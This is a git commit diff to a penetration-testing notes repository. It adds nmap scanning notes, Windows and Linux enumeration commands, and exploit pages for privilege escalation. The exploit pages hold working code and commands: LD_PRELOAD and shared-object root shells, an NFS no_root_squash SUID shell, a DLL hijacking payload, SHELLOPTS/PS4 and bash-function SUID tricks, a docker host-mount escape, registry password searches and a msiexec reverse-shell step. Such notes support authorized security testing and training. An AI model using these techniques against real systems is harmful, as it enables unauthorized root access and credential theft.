bump

.gitmodules

@@ -40,3 +40,12 @@
 [submodule "enumeration/RustScan"]
 	path = enumeration/RustScan
 	url = https://github.com/RustScan/RustScan.git
+[submodule "post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester"]
+	path = post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester
+	url = https://github.com/mzet-/linux-exploit-suggester
+[submodule "post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration"]
+	path = post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration
+	url = https://github.com/diego-treitos/linux-smart-enumeration
+[submodule "post_exploitation/priv_esc/privesc-scripts/linuxprivchecker"]
+	path = post_exploitation/priv_esc/privesc-scripts/linuxprivchecker
+	url = https://github.com/linted/linuxprivchecker

enumeration/docs/nmap.md

@@ -1,6 +1,20 @@
 # nmap
 
-# Usage
+## Scan Types
+* ARP
+* ICMP
+* TCP
+* UDP
+
+## Port States
+1. Open
+2. Closed
+3. Filtered
+4. Unfiltered
+5. Open|Filtered
+6. Close|Filtered
+
+## Usage
 
 ```sh
 nmap -oA nmap-full -Pn -sS  -T4  -p- --defeat-rst-ratelimit <IP>
@@ -9,13 +23,105 @@ nmap -oA nmap-full -Pn -sS  -T4  -p- --defeat-rst-ratelimit <IP>
 nmap  -oA  nmap-vuln -Pn  -script vuln  -p <Port,Port,Port,...> <IP>
 ```
 
-## combo with searchsploit 
+### combo with searchsploit 
 * nmap-full scan
 ```sh
 sudo nmap -oA --nmap-full -sS -sC -sV -p- --defeat-rst-ratelimit <target-IP>
 searchsploit --nmap ./nmap-full.xml --verbose
 ```
-## Wordpress Enumeration
+### Wordpress Enumeration
 ```sh
 nmap --script http-wordpress-enum --scripts-args check-latest=true,search-limit=1500 -p 80 test.com
 ```
+
+### Use List of Hosts
+```sh
+nmap -iL <ListofHosts>
+```
+* Show hosts, dns resolution included
+```sh
+nmap -sL -n 10.10.0.0/16
+```
+
+### ARP Scan Local Network
+```sh
+nmap -PR -sn 192.168.0.0/24
+```
+### ICMP Scans
+* __Type 8__ (Ping Request)
+```sh
+nmap -PE -sn 10.10.0.0/16
+```
+* __Type 13__ (Timestamp Request)
+```sh
+nmap -PP -sn 10.10.0.0/16
+```
+* __Type 17__ (Address Mask Queries)
+```sh
+nmap -PM -sn 10.10.0.0/16
+```
+
+### TCP Scans
+* `-PS23` Syn on port 23
+* `-PA80-8080` ACK on port range 80-8080
+
+#### TCP Scan Types
+* __Null Scan__ `-sN`, port is open when there is no response. Otherwise the response is `RST/ACK`
+* __FIN Scan__ `-sF` , same procedure as null scan.
+* __Xmas Scan__ `-sX`, `FIN/PSH/URG` is sent. `RST/ACK` when port is closed.
+* __Maimon Scan__ `-sM`, sends `FIN/ACK`. Packet is dropped when port is open. Only viable on old BSD networks.
+* __ACK Scan__ `-sA`, sends `ACK`. Receives `RST` regardless of the state of the port. May be used to explore firewall rules.
+* __Window Scan__ `-sW`, sends `ACK`, and receives `RST` as well. Inspects the window part of the response. Used to expose firewall rules.
+* __Custom Scan__ `--scanflags RSTACKFIN`, set flags randomly.
+
+### UDP SCans
+* `-PU` 
+* May be answered by ICMP Type 3 if the port is not reachable
+
+### DNS Scan
+* No lookup `-n`
+* Reverse lookup for every host `-R` 
+* Host discovery only `-sn`
+
+### Spoofing
+* IP `-S <spoofed-IP>`
+* MAC `--spoof-mac <spoofed-MAC>`
+* Disable ping scan `-Pn`
+* Decoy addresses `-D <decoy-IP>,<decoy-IP>,<decoy-IP>,RND,RND,ME`
+
+### Service Detection
+* `-sV`
+* `--version-intensity <level 0-9>`
+* Intensity 2 `--version-light`
+* Intensity 9 `--version-all`
+
+## Scripts
+Installed at `/usr/share/nmap/scripts`
+* __auth__    Authentication related scripts
+* __broadcast__   Discover hosts by sending broadcast messages
+* __brute__   Performs brute-force password auditing against logins
+* __default__ Default scripts, same as -sC
+* __discovery__   Retrieve accessible information, such as database tables and DNS names
+* __dos Detects__ servers vulnerable to Denial of Service (DoS)
+* __exploit__ Attempts to exploit various vulnerable services
+* __external__    Checks using a third-party service, such as Geoplugin and Virustotal
+* __fuzzer__  Launch fuzzing attacks
+* __intrusive__   Intrusive scripts such as brute-force attacks and exploitation
+* __malware__ Scans for backdoors
+* __safe__    Safe scripts that won’t crash the target
+* __version__ Retrieve service versions
+* __vuln__    Checks for vulnerabilities or exploit vulnerable services
+
+## Tips & Tricks
+* Scan the 100 most interesting ports via `-F`
+* `--top-ports 100` 
+* One probe every 5 minutes via `-T0`
+* A closed port responds with `RST/ACK` to a initial `SYN`
+* Scan ports iteratively by using `-r`, not random
+* Closed Port 
+* Control packet rate via `--min-rate` and `--max-rate`
+* Control parallel probes via `--min-parallelism` and `--max-parallelism`
+* Fragment packets `-f` 8 bytes, `-ff` 16 bytes or `--mtu`
+* Zombie Scan `-sI <pwnd-device-IP>` via pwnd host inside the targets network
+* `--reason`, `-d`, `-vv`
+* `--traceroute`

enumeration/windows/powershell.md

@@ -63,7 +63,7 @@ Get-ChildItem | Sort-Object
 Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
 ``` 
 ```sh
-Get-HotFix | Format-list | findstr <searchstring>
+Get-HotFix | Format-list | findstr  <searchstring>
 ```
 ```sh
 Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
@@ -160,6 +160,10 @@ Get-WmiObject win32_useraccount | Select name, sid
 ```
 
 ### Network intel
+* Connections
+```sh
+netstat -ano
+```
 * IP Address
 ```
 Get-NetIpAddress
@@ -183,7 +187,14 @@ Get-Hotfix
 ```
 Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
 ```
+```sh
+wmic qfe get Caption,Description,HotFixID,InstalledOn
+```
 
+### Drivers
+```sh
+driverquery
+```
 
 ### Processes
 * Start processes
@@ -195,6 +206,10 @@ Start-Process <process>
 ```sh
 Get-Process <process>
 ```
+### Scheduled tasks
+```sh
+schtasks /query /fo LIST /v
+```
 * Scheduled Tasks, by TaskName
 ```
 Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
@@ -236,6 +251,15 @@ for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
 1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
 ```
 
+### Antivirus
+```sh
+sc query windefend
+```
+* Service name unknown
+```sh
+sc queryex type=service
+```
+
 ### Using Powerview
 ```sh
 Import-Module .\powerview.ps1

exploit/linux/ld_preload.md

@@ -0,0 +1,21 @@
+# LD_PRELOAD
+
+* Preload libs and do interpositioning of functions.
+
+## Example
+```sh
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+
+void _init() {
+    unsetenv("LD_PRELOAD");
+    setgid(0);
+    setuid(0);
+    system("/bin/bash");
+}
+```
+* `gcc -fPIC -shared -o lib.so lib.c -nostartfiles`
+* `sudo LD_PRELOAD=lib.so apache2`
+* `$ id`
+

exploit/linux/nfs_rootsquash.md

@@ -0,0 +1,21 @@
+# NFS RootSquash
+
+* [hacktricks](https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe)
+* `no_root_squash` has to be as an option on the NFS device
+
+## Usage
+* `showmount -e <target-IP>`
+* `mkdir /tmp/net_volume`
+
+* Connect to NFS share
+```sh
+mount -o rw,vers=2 <nfsShare-IP>:/tmp /tmp/net_volume
+```
+
+* Create root shell inside the dir of the share
+```sh
+echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/net_volume/shell.c
+gcc /tmp/net_volume/shell.c -o /tmp/net_volume/shell
+chmod +s /tmp/net_volume/shell
+```
+

exploit/linux/shared_object_injection.md

@@ -0,0 +1,24 @@
+# Shared Object Injection
+
+* [gaffe23](https://github.com/gaffe23/linux-inject)
+* [exploit-db](https://www.exploit-db.com/papers/37606)
+
+* Test binary via 
+```sh
+strace <binary> 2>&1 | grep -i -E "open|access|no such file"
+```
+
+## Example
+
+```sh
+#include <stdio.h>
+#include <stdlib.h>
+
+static void inject ( ) __attribute__ ( (constructor) );
+
+void inject ( ) {
+    system ( "cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p" );
+}
+```
+* `gcc -fPIC -shared -o ~/.config/lib.so ~/.config/lib.c`
+* Run binary using the lib

exploit/windows/dll_hijacking/dll_hijacking.md

@@ -0,0 +1,42 @@
+# DLL Hijacking
+
+## Search Orders
+* __SafeDllSearchMode__ enabled searches paths in following order: 
+    * __cwd__ of executable
+    * System directory, `GetSystemDirectory`
+    * 16-bit system directory 
+    * Windows, `GetWindowsDirectory`
+    * __pwd__
+    * PATH
+
+* __SafeDllSearchMode__ disabled searches in following order:
+    * __cwd__ of executable
+    * __pwd__ 
+    * System directory
+    * 16-bit system directory
+    * Windows directory 
+    * PATH environment variable
+
+## Template
+```C
+#include <windows.h>
+
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+    if (dwReason == DLL_PROCESS_ATTACH) {
+        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
+        ExitProcess(0);
+    }
+    return TRUE;
+}
+```
+* Compilation via
+```sh
+x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
+```
+* Upload to target
+* Restart dllsvervice via
+```sh
+sc stop dllsvc
+sc start dllsvc
+```
+

exploit/windows/dll_hijacking/hijackdll.c

@@ -0,0 +1,14 @@
+// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
+// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
+
+#include <windows.h>
+
+BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+    if (dwReason == DLL_PROCESS_ATTACH) {
+        system("cmd.exe /k whoami > C:\\Temp\\dll.txt");
+        ExitProcess(0);
+    }
+    return TRUE;
+}
+
+

exploit/windows/docs/always_installed_elevated.md

@@ -11,7 +11,14 @@ msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker-IP> LPORT=<attacker-Po
 ```
 * start the msi on target
 ```sh
-msiexec /quiet /qn /i C:\shell.msi
+msiexec /quiet /qn /i C:\Temp\shell.msi
+```
+
+## Set Registry Keys
+* Alternative method
+```sh
+reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
+reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
 ```
 
 

exploit/windows/docs/unquoted_path.md

@@ -1,7 +1,10 @@
 # Unquoted Path
 
 * Path to a service without quotes can be hijacked by inserting other executables and services into the path.
-* Some part of path has to be writeable.
+* Some part of path has to be writeable, windows tries to insert `.exe` instead of a space.
+* Check services via `wmic service get name,displayname,pathname,startmode` and `sc qc <servicename>`
+* Check permissions on paths via `.\accesschk64.exe /accepteula -uwdq "C:\Service Path\"`
+
 ## Example
 * The unqoted path is `C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe`
 ```sh

misc/level3_hypervisor/docker_sec/docker.md

@@ -50,10 +50,18 @@ find / -name "*sock"
 groups
 ```
 
-* Mount the host volume and chroot to it, need alpine image
+* Mount the host volume and chroot to it, need alpine image. 
+```sh
+docker images
+```sh
 ```sh
 docker run -v /:/mnt --rm -it alpine chroot /mnt sh
 ```
+or
+```sh
+docker run -v /:/host --rm -it <imageID> chroot /host/ bash
+```
+
 
 ## Shared Namespaces
 * Namespaces

post_exploitation/docs/linux.md

@@ -0,0 +1,37 @@
+# Linux enumeration
+
+* `cat /etc/*-release` * `cat /proc/version`
+* `hostname`
+* `uname -a`
+* `cat /etc/issue`
+
+* `ps wuax ` or `ps ajxf` or `ps -A`
+
+* `printenv` or `env`
+
+* `sudo -l`
+
+* `id`
+* `whoami`
+ 
+* `groups` and `getent group`
+
+* `cat /etc/passwd`
+
+* `history`
+
+* `ip` or `ifconfig`
+* `ip route`
+* `netstat -natup` or `ss natup`
+* `netstat -s` and `netstat -i`
+* `lsof -i`
+
+* Find SUID permissions on files and dirs
+* `find / -perm /6000 -ls 2>/dev/null`
+
+* Find writeables dirs
+* `find / -writable -type d 2>/dev/null` or `find / -perm -o w -type d 2>/dev/null`
+* `find / -perm -o x -type d 2>/dev/null`
+
+* Find writeable subdirs
+`find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u`

post_exploitation/docs/mitm.md

@@ -0,0 +1,6 @@
+# Man In the Middle
+
+* [Ettercap](https://www.ettercap-project.org/)
+* [Bettercap](https://www.bettercap.org/)
+
+

post_exploitation/priv_esc/docs/linux_priv_esc.md

@@ -6,3 +6,71 @@
 * [Smart Enumeration](https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh)
 * [Linux Exploit Suggester](https://github.com/mzet-/linux-exploit-suggester)
 * [GTFObins](https://gtfobins.github.io/) 
+* [Linpeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
+
+## Kernel Exploits
+
+### Dirty COW
+* [CVE-2016-5195](https://dirtycow.ninja/)
+* [c0w.c](../kernel-exploits/dirtycow)
+
+## Stored Keys & Passwords
+* History
+* Environment Variables 
+* Config + Dot Files
+* SSH keys
+```sh
+find / -type f -name "authorized_keys" -o -name "id_rsa" 2>/dev/null
+```
+
+## Permissions
+* Weak permissions
+* Umask
+* Unshadow via `unshadow /etc/passd /etc/shadow > unshadow.txt` and john or hashcat.
+* SUID
+    * list
+    ```sh
+    find / -perm /6000 -ls 2>dev/null
+    ```
+    * [Shared object injection](../../../exploit/linux/shared_object_injection.md)
+    * [CVE-2016-1247](https://www.cvedetails.com/cve/CVE-2016-1247/)
+
+## Sudo Binary
+* [Baron Samedit](../../../exploit/linux/sudo/baron_samedit.md)
+* [CVE-2019-14287](../../../exploit/linux/sudo/CVE_2019_14287.md)
+* [CVE-2019-18634](../../../exploit/linux/sudo/CVE_2019_18634.md)
+* [LD_PRELOAD](../../../exploit/linux/ld_preload.md)
+* `sudo -l` 
+    * Take a look at GTFObins
+    * Keep an eye on the displayed host and env capabilities 
+    
+## PATH Hijacking
+* Interpositioning binaries via PATH
+    * Look for binaries used in other bins and scripts
+    * Interposition name and add the directory in front of  `$PATH`
+
+## Bash function
+* Interpositioning of binaries via bash functions
+```sh
+function /path/to/binary() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
+```
+```sh
+export -f /path/to/binary
+```
+* Call binary which invokes this function
+
+## Environment Variable
+```sh
+env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '<binary>; set +x; /tmp/bash -p'
+```
+
+## Capabilities
+* [capabilities](../../../exploit/linux/capabilities.md)
+
+## Crontab
+* Check `cat /etc/crontab`
+* Check writable scripts and binaries that are scheduled
+* Check `$PATH` order
+
+## NFS Rootsquash
+* [nfs rootsquash](../../../exploit/linux/nfs_rootsquash.md)

post_exploitation/priv_esc/docs/windows/windows_priv_esc.md

@@ -4,3 +4,74 @@
 * [Fundamentals](https://www.fuzzysecurity.com/tutorials/16.html)
 * [PowerShellEmpire](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp)
 * [JAWS](https://github.com/411Hall/JAWS)
+
+## Account Types
+
+* __Administrator__ local & domain
+* __Standard__ local & domain
+* __Guest__
+* __System__
+
+## Enumeration
+
+### Users & Groups
+```sh
+whoami /priv
+net users
+net users <username>
+net localgroup
+net localgroup <groupname>
+query session
+qwinsta
+```
+
+### Files
+* [powershell](../../../../enumeration/windows/powershell.md)
+
+### System
+```sh
+hostname
+systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+```
+* Installed software
+```sh
+wmic product get name,version,vendor
+```
+* Services
+```sh
+wmic service list brief | findstr  "Running"
+```
+
+## Exploit
+
+### DLL Hijacking
+* [DLL hijacking](../../../../exploit/windows/dll_hijacking/dll_hijacking.md)
+
+### Unquoted Service Path
+* [unquoted service path](../../../../exploit/windows/docs/unqoted_path.md)
+
+### Token Impersonation
+* `SeImpersonatePrivilege` is necessary, check via `whoami priv`
+*  Hot Potato is best before Server 2019 and Windows 10 (version 1809)
+* [Potatos](../../../../exploit/windows/docs/potatoes.md)
+
+### Schedules Tasks
+* `schtasks`
+* `Autoruns64.exe`
+
+### MSI Elevated Installer
+* [Always install elevated](../../../../exploit/windows/docs/always_installed_elevated.md)
+
+### Search for Credentials
+```sh
+cmdkey /list
+```
+* Use found credentials
+```sh
+runas /savecred /user:<user> reverse_shell.exe
+```
+* Keys containing passwords
+```
+reg query HKLM /f password /t REG_SZ /s
+reg query HKCU /f password /t REG_SZ /s
+```

post_exploitation/priv_esc/privesc-scripts/linux-exploit-suggester

@@ -0,0 +1 @@
+Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470

post_exploitation/priv_esc/privesc-scripts/linux-smart-enumeration

@@ -0,0 +1 @@
+Subproject commit 950268573fbb4389fc4cf56b8d75bfb826564e1d

post_exploitation/priv_esc/privesc-scripts/linuxprivchecker

@@ -0,0 +1 @@
+Subproject commit ebf996195c767a9f2008a6ba97abefd2e558de82

reverse_shells/docs/shell_upgrade.md

@@ -19,6 +19,11 @@ php -e 'exec "/bin/bash";'
 python -c 'import pty; pty.spawn("/bin/bash")'
 ```
 
+### Perl
+```perl
+perl -e 'exec "/bin/sh";'
+```
+
 ## Next
 1. `ctrl` + `z`
 2. `stty echo -raw`